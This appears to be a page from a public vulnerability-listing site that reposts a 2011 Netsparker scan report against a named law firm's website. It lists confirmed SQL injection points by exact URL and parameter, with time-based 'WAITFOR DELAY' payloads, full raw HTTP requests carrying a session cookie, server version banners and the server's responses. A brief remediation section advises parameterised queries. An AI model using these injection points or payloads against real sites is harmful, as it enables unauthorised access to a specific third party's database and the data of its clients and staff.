mccarter.com, XSS GHDB DORK REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Private Reporting of Security Research is preferred for Online Service Providers



Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.mccarter.com/new/homenew.aspx?sear...
SCAN DATE
5/12/2011 11:18:45 AM
REPORT DATE
6/20/2011 10:11:39 AM
SCAN DURATION
00:22:25

Total Requests

Average Speed

req/sec.
39
identified
24
confirmed
20
critical
7
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Blind SQL Injection, Boolean SQL Injection, SQL Injection
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
51 %
MEDIUM
5 %
LOW
26 %
INFORMATION
18 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/new/ Cookie Not Marked As HttpOnly Yes
ViewState is not Encrypted No
/new/about.aspx [Possible] Internal Path Leakage (Windows) No
/new/biosnew.aspx Initial GET Blind SQL Injection Yes
Initial GET SQL Injection Yes
/new/contactnew.aspx [Possible] ASP.NET Source Code Disclosure No
/new/css/ Forbidden Resource Yes
/new/emailpagenew.aspx EmailComments POST MAC is not Enabled in ViewState No
/new/homenew.aspx E-mail Address Disclosure No
[Possible] Internal Path Leakage (Windows) No
/new/locations.aspx [Possible] Internal Path Leakage (Windows) No
/new/showbionew.aspx show GET Blind SQL Injection Yes
show GET Blind SQL Injection Yes
show GET Boolean Based SQL Injection Yes
show GET Boolean Based SQL Injection Yes
show GET SQL Injection Yes
show GET SQL Injection Yes
/new/showlocationnew.aspx show GET Blind SQL Injection Yes
Show GET Blind SQL Injection Yes
show GET Blind SQL Injection Yes
Show GET Blind SQL Injection Yes
show GET Boolean Based SQL Injection Yes
Show GET Boolean Based SQL Injection Yes
show GET Boolean Based SQL Injection Yes
Show GET Boolean Based SQL Injection Yes
show GET SQL Injection Yes
Show GET SQL Injection Yes
show GET SQL Injection Yes
Show GET SQL Injection Yes
Internal Server Error Yes
ASP.NET Version Disclosure No
Database Error Message No
ASP.NET Stack Trace Disclosure No
show GET [Possible] SQL Injection No
Show GET [Possible] SQL Injection No
show GET [Possible] SQL Injection No
Show GET [Possible] SQL Injection No
Microsoft SQL Server Identified Yes
IIS Version Disclosure No
Blind SQL Injection

Blind SQL Injection

7 TOTAL
CRITICAL
CONFIRMED
7
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate the all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /new/showlocationnew.aspx

/new/showlocationnew.aspx CONFIRMED

http://www.mccarter.com/new/showlocationnew.aspx?show=1;WAITFOR%20DELAY%20%270:0:25%27--

Parameters

Parameter Type Value
show GET 1;WAITFOR DELAY '0:0:25'--

Request

GET /new/showlocationnew.aspx?show=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 16:20:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /new/homenew.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134


<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/new/homenew.aspx'>here</a>.</h2>
</body></html>
- /new/showlocationnew.aspx

/new/showlocationnew.aspx CONFIRMED

http://www.mccarter.com/new/showlocationnew.aspx?PrintPage=True&Show=1;WAITFOR%20DELAY%20%270:0:25%2..

Parameters

Parameter Type Value
PrintPage GET True
Show GET 1;WAITFOR DELAY '0:0:25'--
sortby GET 3
by GET 3
title GET 3
related GET 3

Request

GET /new/showlocationnew.aspx?PrintPage=True&Show=1;WAITFOR%20DELAY%20%270:0:25%27--&sortby=3&by=3&title=3&related=3 HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 16:24:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /new/homenew.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134


<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/new/homenew.aspx'>here</a>.</h2>
</body></html>
- /new/showbionew.aspx

/new/showbionew.aspx CONFIRMED

http://www.mccarter.com/new/showbionew.aspx?show=%27;WAITFOR%20DELAY%20%270:0:25%27--&Related=3

Parameters

Parameter Type Value
show GET ';WAITFOR DELAY '0:0:25'--
Related GET 3

Request

GET /new/showbionew.aspx?show=%27;WAITFOR%20DELAY%20%270:0:25%27--&Related=3 HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showbionew&Show=1121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:37:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30351



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<title>McCarter&amp;English | Daniel Pollack</title>
<META NAME="KEYWORDS" CONTENT="Daniel,Pollack,Daniel Pollack," >
<META NAME="DESCRIPTION" CONTENT="Mr. Pollack has practiced law in New York City for over 40 years. His practice has centered on the conduct of financial litigation, advising corporations on issues of corporate governance and advising executives on employment agreements and exit agre">

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOODP">
<META NAME="KEYWORDS" CONTENT="McCarter,McCarter & English,McCarter and English,McCarter English">
<META NAME="DESCRIPTION" CONTENT="McCarter & English, LLP is a firm of over 400 lawyers with offices in Boston, Hartford, Stamford, New York City, Newark, Philadelphia and Wilmington.">
<script language="JavaScript" type="text/JavaScript">
<!--
function OpenWindow(url, name,features )
{
window.open(url, name,features)
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<script>
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
</script>
<script>
function emailWarning(){
//str = 'NOTICE.  These materials have been prepared by McCarter &amp; English, LLP for ' +
// 'informational purposes only and are not legal advice.  This information is not ' +
// 'intended to create, and receipt of it does not constitute, a lawyer-client ' +
// 'relationship.  You should not act upon this information without seeking ' +
// 'professional counsel.  In addition, we cannot represent you until we know that ' +
// 'doing so will not create a conflict of interest.  Nor can we treat unsolicited ' +
// 'information as confidential. \n\nAccordingly, please do not send us any ' +
// 'information about any matter that may involve you until you receive a ' +
// 'written statement from us that we represent you (an "engagement letter").\n\nBy ' +
// 'clicking "OK" you are confirming that you have read and understand this notice';

str = 'The McCarter & English website is for informational purposes only. We do not provide legal advice on this website. We can provide legal advice only to our clients in specific inquiries that they address to us. If you are interested in becoming a client, please contact us, but do not send us any information about your specific legal question. We cannot serve as your lawyers until we establish an attorney-client relationship, which can occur only after we follow procedures within our firm and after we agree to the terms of representation.'

return(confirm(str));
}
</script>
<link href="stylesnormal.css" rel="stylesheet" type="text/css">
<link href="css/me_allnew.css" rel="stylesheet" type="text/css">
<SCRIPT language="javascript" src="SlideMenuNew.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" src="MM.js" type="text/javascript"></SCRIPT>
<script>alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];</script>
<script language="javascript" type="text/javascript">
function decryptString(str){
strLength = str.length;
strKey = "pwmeucnwskdweiwoeixmewuwnexmcvhknrd";
keyLength = strKey.length;
decryptedStr = "";
var i;
for(i = 0;i<strLength;i++){
if(str.charAt(i) != "?"){
offset = alpha.join('').indexOf(strKey.charAt(i % keyLength).toUpperCase());
charIndex = alpha.join('').indexOf(str.charAt(i).toUpperCase());
//alert(charIndex);
plainTextIndex = (charIndex - offset);
if(plainTextIndex < 0){
while(plainTextIndex < 0){
plainTextIndex = (alpha.length) + plainTextIndex; //Add cuz PlainTextIndex is negative
}
}else{
plainTextIndex = plainTextIndex % (alpha.length);
}
if(charIndex > -1){
tmpChar = alpha[plainTextIndex];
}else{
tmpChar = str.charAt(i).toUpperCase();
}
if(str.charAt(i).toUpperCase() != str.charAt(i)) tmpChar = tmpChar.toLowerCase();
decryptedStr = decryptedStr + tmpChar;
}else{
for(j=i;j<strLength;j++){
decryptedStr = decryptedStr + str.charAt(j);
}
break;
}
}
return decryptedStr;
}
function decryptAll(){
var i;
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:" && document.links[i].getAttribute("encrypted") == "true"){
document.links[i].href = "mailto:" + decryptString(document.links[i].href.substring(document.links[i].href.indexOf(':')+1));
if(document.links[i].innerHTML.indexOf('@') > 0){
if(document.links[i].innerHTML.indexOf('?') > 0){
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1,document.links[i].href.indexOf('?')-document.links[i].href.indexOf(':')+2);
}else{
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
}
}
//if(document.links[i].innerHTML.indexOf('mailto:') > 0) document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
document.links[i].setAttribute("encrypted","false");
document.links[i].style.visibility = '';
}
}
document.body.onmouseover = function(){};
}
</script>
<SCRIPT language="JavaScript" type="text/javascript">
var menu1;
var menu2;
var menu3;
var menu4;
var menu5;
var menu6;
function buildMenus(){
menu1 = new ypSlideOutMenu("menu1", "", '','', 150, 100);
menu2 = new ypSlideOutMenu("menu2", "", '','', 190, 100);
menu3 = new ypSlideOutMenu("menu3", "", '','', 150, 100);
menu4 = new ypSlideOutMenu("menu4", "", '','', 150, 125);
menu5 = new ypSlideOutMenu("menu5", "", '','', 150, 100);
menu6 = new ypSlideOutMenu("menu6", "", '','', 150, 125);
}
buildMenus();
function repositionMenus(){
}
//window.onresize = repositionMenus;
</SCRIPT>

<style type="text/css">

P,TD,FONT,SPAN,DIV { COLOR: #666666; font-family: Arial; font-size: 11px; }
FONT { COLOR: #666666; font-family: Arial; font-size: 11px; }
A { text-decoration:none; }
A:Hover{ text-decoration:none; color:#000000; }
body { <!--SCROLLBAR-FACE-COLOR: #ffffff; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #969696; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #969696; SCROLLBAR-DARKSHADOW-COLOR: #000000;--> scrollbar-face-color:#ffffff;scrollbar-arrow-color:#000000;scrollbar-track-color:#ffffff;scrollbar-shadow-color:#ffffff;scrollbar-highlight-color:#ffffff;scrollbar-3dlight-color:#ffffff;scrollbar-darkshadow-color:#ffffff; }
</style>
</HEAD>
<body vLink="#666666" aLink="#666666" link="#666666" style="MARGIN-TOP:0px;MARGIN-BOTTOM:0px;MARGIN-LEFT:0px">
<form name="Form1" method="post" action="showbionew.aspx?show=%27;WAITFOR%20DELAY%20%270:0:25%27--&amp;Related=3" id="Form1">
<input type="hidden" name="__VIEWSTATE" value="dDwtMTc1NDMyNTc3Njt0PDtsPGk8Mj47aTw0PjtpPDY+O2k8OD47aTwxMD47PjtsPHQ8cDxsPFRleHQ7PjtsPERhbmllbCBQb2xsYWNrOz4+Ozs+O3Q8cDxsPFRleHQ7PjtsPFw8TUVUQSBOQU1FPSJLRVlXT1JEUyIgQ09OVEVOVD0iRGFuaWVsLFBvbGxhY2ssRGFuaWVsIFBvbGxhY2ssIiBcPiA7Pj47Oz47dDxwPGw8VGV4dDs+O2w8XDxNRVRBIE5BTUU9IkRFU0NSSVBUSU9OIiBDT05URU5UPSJNci4gUG9sbGFjayBoYXMgcHJhY3RpY2VkIGxhdyBpbiBOZXcgWW9yayBDaXR5IGZvciBvdmVyIDQwIHllYXJzLiBIaXMgcHJhY3RpY2UgaGFzIGNlbnRlcmVkIG9uIHRoZSBjb25kdWN0IG9mIGZpbmFuY2lhbCBsaXRpZ2F0aW9uLCBhZHZpc2luZyBjb3Jwb3JhdGlvbnMgb24gaXNzdWVzIG9mIGNvcnBvcmF0ZSBnb3Zlcm5hbmNlIGFuZCBhZHZpc2luZyBleGVjdXRpdmVzIG9uIGVtcGxveW1lbnQgYWdyZWVtZW50cyBhbmQgZXhpdCBhZ3JlIlw+Oz4+Ozs+O3Q8O2w8aTwwPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxzY3JpcHRcPmFscGhhID0gWydBJywnQicsJ0MnLCdEJywnRScsJ0YnLCdHJywnSCcsJ0knLCdKJywnSycsJ0wnLCdNJywnTicsJ08nLCdQJywnUScsJ1InLCdTJywnVCcsJ1UnLCdWJywnVycsJ1gnLCdZJywnWiddXDtcPC9zY3JpcHRcPjs+Pjs7Pjs+Pjt0PDtsPGk8MTM+Oz47bDx0PDtsPGk8Nz47aTw5PjtpPDExPjtpPDEzPjs+O2w8dDxwPGw8VGV4dDs+O2w8TXIuIFBvbGxhY2sgaGFzIHByYWN0aWNlZCBsYXcgaW4gTmV3IFlvcmsgQ2l0eSBmb3Igb3ZlciA0MCB5ZWFycy4gSGlzIHByYWN0aWNlIGhhcyBjZW50ZXJlZCBvbiB0aGUgY29uZHVjdCBvZiBmaW5hbmNpYWwgbGl0aWdhdGlvbiwgYWR2aXNpbmcgY29ycG9yYXRpb25zIG9uIGlzc3VlcyBvZiBjb3Jwb3JhdGUgZ292ZXJuYW5jZSBhbmQgYWR2aXNpbmcgZXhlY3V0aXZlcyBvbiBlbXBsb3ltZW50IGFncmVlbWVudHMgYW5kIGV4aXQgYWdyZWVtZW50cy4gXDxiclw+XDxiclw+TXIuIFBvbGxhY2sgcmVjZWl2ZWQgYSBCLkEuLCBcPGVtXD5tYWduYSBjdW0gbGF1ZGVcPC9lbVw+LCBmcm9tIEhhcnZhcmQgQ29sbGVnZSBpbiAxOTYwLCByZWNlaXZlZCBhbiBNLkEuIGluIFBoaWxvc29waHksIFBvbGl0aWNzIGFuZCBFY29ub21pY3MgZnJvbSBPeGZvcmQgVW5pdmVyc2l0eSBpbiAxOTYyIGFuZCBhbiBMTC5CLiBmcm9tIEhhcnZhcmQgTGF3IFNjaG9vbCBpbiAxOTY1LiBIZSBmb3VuZGVkIGhpcyBwcmV2aW91cyBmaXJtLCBrbm93biBhcyBQb2xsYWNrICZhbXBcOyBLYW1pbnNreSwgaW4gMTk2Ny4gXDxiclw+XDxiclw+SW4gMTk3OSwgcmVwcmVzZW50aW5nIEFuY2hvciBDb3Jwb3JhdGlvbiwgYSBsYXJnZSBOZXcgSmVyc2V5LWJhc2VkIG11dHVhbCBmdW5kIGNvbXBhbnksIE1yLiBQb2xsYWNrIGFyZ3VlZCBhbmQgd29uLCBpbiB0aGUgU3VwcmVtZSBDb3VydCBvZiB0aGUgVW5pdGVkIFN0YXRlcywgdGhlIGxhbmRtYXJrIGNhc2Ugb24gY29ycG9yYXRlIGdvdmVybmFuY2UgaW4gdGhlIG11dHVhbCBmdW5kIGZpZWxkLCBcPGVtXD5CdXJrcyB2LiBMYXNrZXJcPC9lbVw+LiBUaGF0IGNhc2Ugd2FzIHRoZSBmaXJzdCB0byBlbmRvcnNlIHRoZSB1c2Ugb2YgYSBTcGVjaWFsIENvbW1pdHRlZSBvZiBJbmRlcGVuZGVudCBEaXJlY3RvcnMgYXMgYSB2ZWhpY2xlIGZvciBkZXRlcm1pbmluZyB0aGUgYXBwcm9wcmlhdGUgY291cnNlIG9mIGFjdGlvbiBmb3IgYSBtdXR1YWwgZnVuZCBjb21wYW55IGluIGxpdGlnYXRpb24uIE1yLiBQb2xsYWNrIHJldHVybmVkIHRvIHRoZSBTdXByZW1lIENvdXJ0IG9mIHRoZSBVbml0ZWQgU3RhdGVzIGluIDE5ODMsIGFyZ3VpbmcgdGhlIGNhc2Ugb2YgXDxlbVw+RGFpbHkgSW5jb21lIEZ1bmQgdi4gRm94XDwvZW1cPiwgYW5vdGhlciBtdXR1YWwgZnVuZCBsaXRpZ2F0aW9uLiBcPGJyXD5cPGJyXD5Nci4gUG9sbGFjayB3YXMgYWxzbyB0aGUgc3VjY2Vzc2Z1bCBMZWFkIFRyaWFsIENvdW5zZWwgaW4gdGhyZWUgb2YgdGhlIHNpeCBtdXR1YWwgZnVuZCBhZHZpc29yeSBmZWUgY2FzZXMgdGhhdCBoYXZlIGJlZW4gdHJpZWQgdG8ganVkZ21lbnQgdW5kZXIgU2VjdGlvbiAzNiAoYikgb2YgdGhlIEludmVzdG1lbnQgQ29tcGFueSBBY3Qgb2YgMTk0MCwgaW5jbHVkaW5nIFw8ZW1cPlNjaHV5dCB2LiBSb3dlIFByaWNlIFByaW1lIFJlc2VydmUgRnVuZFw8L2VtXD4gKGZvciBULiBSb3dlIFByaWNlKSwgXDxlbVw+S2FsaXNoIHYuIEZyYW5rbGluIEFkdmlzb3JzXDwvZW1cPiAoZm9yIEZyYW5rbGluIFJlc291cmNlcykgYW5kIFw8ZW1cPk1leWVyIHYuIE9wcGVuaGVpbWVyXDwvZW1cPiAoZm9yIE9wcGVuaGVpbWVyIE1hbmFnZW1lbnQpLiBNb3N0IHJlY2VudGx5LCBNci4gUG9sbGFjayB3YXMgdGhlIHN1Y2Nlc3NmdWwgTGVhZCBDb3Vuc2VsIGluIFw8ZW1cPlNtaXRoIHYuIEZyYW5rbGluIFRlbXBsZXRvbiBEaXN0cmlidXRvcnNcPC9lbVw+IChmb3IgRnJhbmtsaW4gRGlzdHJpYnV0b3JzKSwgd2lubmluZyBhIGRpc21pc3NhbCBvZiB0aGUgY2FzZSBpbiBKdW5lIDIwMTAgaW4gdGhlIEZlZGVyYWwgQ291cnQgZm9yIHRoZSBOb3J0aGVybiBEaXN0cmljdCBvZiBDYWxpZm9ybmlhLiBcPGJyXD5cPGJyXD5JbiAyMDA1IE1yLiBQb2xsYWNrLCBhY3Rpbmcgb24gYmVoYWxmIG9mIEouICZhbXBcOyBXLiBTZWxpZ21hbiwgYSBtdXR1YWwgZnVuZCBjb21wYW55LCBjaGFsbGVuZ2VkIE5ldyBZb3JrIEF0dG9ybmV5IEdlbmVyYWwgRWxsaW90IFNwaXR6ZXIgYnkgZmlsaW5nIGEgbGF3c3VpdCBhZ2FpbnN0IGhpbSBmb3IgZXhjZWVkaW5nIGhpcyBhdXRob3JpdHkgaW4gdGhlIG1hcmtldC10aW1pbmcgaW52ZXN0aWdhdGlvbnMuIEF0IHRoZSB0aW1lIG9mIHRoYXQgbGF3c3VpdCwgVGhlIFdhbGwgU3RyZWV0IEpvdXJuYWwgcHVibGlzaGVkIGFuIGVkaXRvcmlhbCBlbnRpdGxlZCAiTWFuIEJpdGVzIERvZyIgcHJhaXNpbmcgdGhlIGNvdXJhZ2Ugb2YgU2VsaWdtYW4gYW5kIE1yLiBQb2xsYWNrIGZvciB0aGVpciB3aWxsaW5nbmVzcyB0byBzdGFuZCB1cCB0byBNci4gU3BpdHplci4gTXIuIFBvbGxhY2sgZmlyc3QgY2FtZSB0byBwdWJsaWMgbm90aWNlIGVhcmx5IGluIGhpcyBjYXJlZXIgaW4gYSBsZW5ndGh5IHRyaWFsIG9uIGJlaGFsZiBvZiBpbnN0aXR1dGlvbmFsIGNvbW1lcmNpYWwgcGFwZXIgaG9sZGVycyBhZ2FpbnN0IEdvbGRtYW4gU2FjaHMgYXJpc2luZyBvdXQgb2YgdGhlIGNvbGxhcHNlIG9mIFBlbm4gQ2VudHJhbC4gSGlzIGdyb3VuZC1icmVha2luZyB3b3JrIGluIHRoYXQgdHJpYWwgd2FzIGNocm9uaWNsZWQgaW4gYSBib29rIHB1Ymxpc2hlZCBsYXN0IHllYXIgb24gR29sZG1hbiBTYWNocyBlbnRpdGxlZCAiVGhlIFBhcnRuZXJzaGlwLiIgXDxiclw+XDxiclw+TXIuIFBvbGxhY2sgaGFzLCBkdXJpbmcgdGhlIGNvdXJzZSBvZiBoaXMgY2FyZWVyLCB0cmllZCBvdmVyIDIwIGNpdmlsIGp1cnkgdHJpYWxzIHRvIHZlcmRpY3QgYW5kIG92ZXIgMzAgbm9uLWp1cnkgdHJpYWxzLiBIZSBoYXMgYXBwZWFyZWQgYXMgYXBwZWxsYXRlIGNvdW5zZWwgaW4gbnVtZXJvdXMgZmVkZXJhbCBhbmQgc3RhdGUgYXBwZWxsYXRlIGNvdXJ0cywgaXMgYSBNZW1iZXIgb2YgdGhlIEJhciBvZiB0aGUgVS5TLiBTdXByZW1lIENvdXJ0IGFuZCBpcyBhIE1lbWJlciBvZiB0aGUgQmFyIG9mIHRoZSBGaXJzdCwgU2Vjb25kLCBUaGlyZCwgRm91cnRoLCBTZXZlbnRoIGFuZCBFbGV2ZW50aCBDaXJjdWl0cy4gSGUgd2FzIGVsZWN0ZWQgYSBGZWxsb3cgb2YgdGhlIEFtZXJpY2FuIENvbGxlZ2Ugb2YgVHJpYWwgTGF3eWVycyBpbiAxOTg1LiBSZXByZXNlbnRhdGl2ZSBjb3Jwb3JhdGUgbGl0aWdhdGlvbiBjbGllbnRzIGhhdmUgaW5jbHVkZWQ6IFQuIFJvd2UgUHJpY2UgQXNzb2NpYXRlcywgRnJhbmtsaW4tVGVtcGxldG9uLCBBSU0sIEZpZGVsaXR5LCBXYWNob3ZpYSwgVUJTIEFzc2V0IE1hbmFnZW1lbnQsIFBOQyBBZHZpc29ycywgUE5DIEJhbmsgTi5BLiwgSi4gJmFtcFw7IFcuIFNlbGlnbWFuIGFuZCBBTUVSSVBSSVNFLiBcPGJyXD5cPGJyXD5Bbm90aGVyIGFzcGVjdCBvZiBoaXMgcHJhY3RpY2Ugc2luY2UgMTk5MCBoYXMgZm9jdXNlZCBvbiByZXByZXNlbnRpbmcgc2VuaW9yIGNvcnBvcmF0ZSBleGVjdXRpdmVzIG9yIGNvcnBvcmF0aW9ucyBpbiBleGl0IGFuZCBlbnRyeSBuZWdvdGlhdGlvbnMgYW5kIGFncmVlbWVudHMuIEluIHRoaXMgY29udGV4dCBoZSBoYXMsIGluIHJlY2VudCB5ZWFycywgYWR2aXNlZCB0aGUgQ0VPIG9mIFB1dG5hbSwgdGhlIENFTyBvZiBSb2NrZWZlbGxlciAmYW1wXDsgQ28sIHRoZSBDRU8gb2YgRHJlc2RuZXIgS2xlaW53b3J0IGFuZCB0aGUgQ0VPIG9mIEhTQkMsIGFtb25nIG90aGVycy4gTXIuIFBvbGxhY2sgaGFzIHNlcnZlZCBhcyBhbiBBZGp1bmN0IFByb2Zlc3NvciBhdCB0aGUgVW5pdmVyc2l0eSBvZiBBcml6b25hIExhdyBTY2hvb2wsIHRlYWNoaW5nIGEgc2VtaW5hciBpbiAyMDA5IGFuZCAyMDEwIG9uICJOZWdvdGlhdGluZyBFbXBsb3ltZW50IEFncmVlbWVudHMuIiZuYnNwXDsgSGUgaXMgbGlzdGVkIGluIHRoZSAyMDA4LTIwMTEgaXNzdWVzIG9mIFw8aVw+VGhlIEJlc3QgTGF3eWVycyBpbiBBbWVyaWNhXDwvaVw+Llw8YnJcPlw8YnJcPk1yLiBQb2xsYWNrIGlzIG1hcnJpZWQgdG8gU3VzYW4gRi4gUG9sbGFjaywgYSBncmFkdWF0ZSBvZiBSYWRjbGlmZmUgQ29sbGVnZSBhbmQgSGFydmFyZCBMYXcgU2Nob29sIGFuZCBDb3Vuc2VsIHRvIHRoZSBsYXcgZmlybSBvZiBDdXJ0aXMgTWFsbGV0LVByZXZvc3QgQ29sdCAmYW1wXDsgTW9zbGUsIExMUC4gTXIuIGFuZCBNcnMuIFBvbGxhY2sgaGF2ZSB0d28gYWR1bHQgY2hpbGRyZW46IGEgc29uIHdobyBpcyBhIGdyYWR1YXRlIG9mIHRoZSBLZWxsb2dnIFNjaG9vbCBvZiBNYW5hZ2VtZW50LCBOb3J0aHdlc3Rlcm4gVW5pdmVyc2l0eSBhbmQgYSBkYXVnaHRlciB3aG8gaXMgYSBncmFkdWF0ZSBvZiBTbG9hbiBTY2hvb2wgb2YgTWFuYWdlbWVudCwgTWFzc2FjaHVzZXR0cyBJbnN0aXR1dGUgb2YgVGVjaG5vbG9neS47Pj47Oz47dDxwPGw8VGV4dDs+O2w8XDxiclw+XDxzcGFuIHN0eWxlPSJjb2xvcjojMDAwMDAwIlw+XDxCXD5FRFVDQVRJT05cPC9iXD5cPC9zcGFuXD5cPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPkxMLkIuLCBIYXJ2YXJkIFVuaXZlcnNpdHksIDE5NjVcPGJyXD5cPGltZyBhbGlnbj1taWRkbGUgc3JjPSJpbWFnZXMvYmxuay5naWYiIGJvcmRlcj0wIHdpZHRoPTEgaGVpZ2h0PTEgdnNwYWNlPTNcPlw8YnJcPkIuQS4vTS5BLiwgT3hmb3JkIFVuaXZlcnNpdHksIE94Zm9yZCwgRW5nbGFuZCwgMTk2Mlw8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w+XDxiclw+Qi5BLiwgSGFydmFyZCBVbml2ZXJzaXR5LCAxOTYwOz4+Ozs+O3Q8cDxsPFRleHQ7PjtsPFw8ZGl2IHN0eWxlPSJjb2xvcjojMDAwMDAwIlw+XDxCXD5cPEJSXD5BRE1JU1NJT05TXDxCUlw+XDxCUlw+XDwvQlw+XDwvZGl2XD5OZXcgWW9ya1w8YnJcPlw8aW1nIGFsaWduPW1pZGRsZSBzcmM9ImltYWdlcy9ibG5rLmdpZiIgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSB2c3BhY2U9M1w+XDxiclw+DQpVLlMuIFN1cHJlbWUgQ291cnQgXDxiclw+XDxpbWcgYWxpZ249bWlkZGxlIHNyYz0iaW1hZ2VzL2Jsbm